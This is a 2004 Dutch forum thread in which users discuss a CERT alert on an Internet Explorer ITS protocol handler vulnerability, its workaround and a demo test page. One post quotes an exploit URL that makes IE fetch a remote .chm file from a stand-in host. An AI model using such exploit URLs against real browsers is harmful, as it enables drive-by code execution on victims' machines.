[IE] Vulnerability in Internet Explorer ITS Protocol Handler - Privacy en beveiliging

vrijdag 9 april 2004 15:35

Acties:

0 Henk 'm!

To infinity and beyond!

Topicstarter

Omdat de search niet werkt, maar het wel een belangrijk probleem is meldt ik 't maar even:

CERT.org meldt
Vulnerability in Internet Explorer ITS Protocol Handler

Heeft te maken met een veiligheidsprobleem in de Help functie van Windows

http://www.us-cert.gov/cas/techalerts/TA04-099A.html

Inclusief een tijdelijke workaround (reg keys verwijderen)

[ Voor 28% gewijzigd door Buzz_Lightyear op 09-04-2004 15:37 ]

An Explanation of l33t Speak

vrijdag 9 april 2004 15:37

Acties:

0 Henk 'm!

pasta

Ondertitel

start.chm
Daar was geen search voor nodig, maar het biedt wel aanvullende informatie over het probleem

Signature

vrijdag 9 april 2004 15:37

Acties:

0 Henk 'm!

Buzz_Lightyear

To infinity and beyond!

Topicstarter

Damn

_{is dat wel helemaal dezelfde? ja dus}

[ Voor 89% gewijzigd door Buzz_Lightyear op 09-04-2004 15:40 ]

An Explanation of l33t Speak

vrijdag 9 april 2004 15:41

Acties:

0 Henk 'm!

pasta

Ondertitel

Ja, zo staat het in ieder geval in het artikel waar de TS naar linkt ongeveer een gelijk voorbeeld.

code:

1	mk@MSITStore:C:\WINDOWS\start.chm:/start.html

code:

1	ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html

Oke, het is niet helemaal dezelfde, maar ze maken beide gebruik van een .chm exploit.

Signature

zaterdag 10 april 2004 13:37

Acties:

0 Henk 'm!

wildhagen

Blablabla

Even een kleine kick.

Op http://ip3e83566f.speed.p...curity/newone/exploit.htm kan je testen of je vulnerable bent voor deze bug (klik op Proceed to demo). Als je vulnerable bent popt in deze test je Windows Media player op.

Ik draai nu met McAfee VirusScan Enterprise 7.5 Beta, en die vangt hem af d.m.v. de nieuwe ScriptScan functionaliteit (detectie als VBS/Psyme)

Op de Frontpage staat inmiddels ook een artikel over deze bug: nieuws: Tijdelijke oplossing voor lek in Internet Explorer;

Virussen? Scan ze hier!

zaterdag 10 april 2004 13:46

Acties:

0 Henk 'm!

Miki

Um... mijn IE vangt um al af door een melding te maken van een script dat moet worden gestart en of ik door wil gaan. Is dit iets van IE of van de makers van de site?

zaterdag 10 april 2004 13:48

Acties:

0 Henk 'm!

wildhagen

Blablabla

Dat lijkt me een security-instelling in jouw Internet Explorer oid, want ik kreeg die melding niet (bij een default install van IE, zonder extra configuratie).

Virussen? Scan ze hier!

zaterdag 10 april 2004 13:53

Acties:

0 Henk 'm!

Verwijderd

Het 'probleem' bij deze demo is dat er(onnodig)gebruik gemaakt wordt van JS, waardoor de exploitatie dus wel te voorkomen is bij sommige configs.

Mind you: De meeste IRC-Worms die voorbijkwamen hadden geen JS nodig om hun werk te doen.
Deze 'test' is dus erg misleidend.

zaterdag 10 april 2004 13:53

Acties:

0 Henk 'm!

Miki

Oh nog wat, ik zie dat deze speciaal voor windows media player is bedoeld, echter in de map C:\<program files folder>\Windows Media Player heb ik geen wmplayer.exe.
Ik heb WMP 9 via cofiguratie scherm - software - windows onderdelen.. WMP verwijderd, misschien daarom. Ik gebruik zelf Realplayer 10 $_/-\o_$

zaterdag 10 april 2004 13:59

Acties:

0 Henk 'm!

0xDEADBEEF

Hm, ook maar ff getest.. Kerio kwam met "Application is being replaced"

code:

1
2
3

Current object: wmplayer.exe
wmplayer.exe Packed: UPX
wmplayer.exe Ok

Die kan rustig gedelete worden ?

/edit Eigenlijk wil ik helemaal van WMP af

[ Voor 15% gewijzigd door 0xDEADBEEF op 10-04-2004 14:05 ]

"Religion is an insult to human dignity. With or without it you would have good people doing good things and evil people doing evil things. But for good people to do evil things, that takes religion." - Steven Weinberg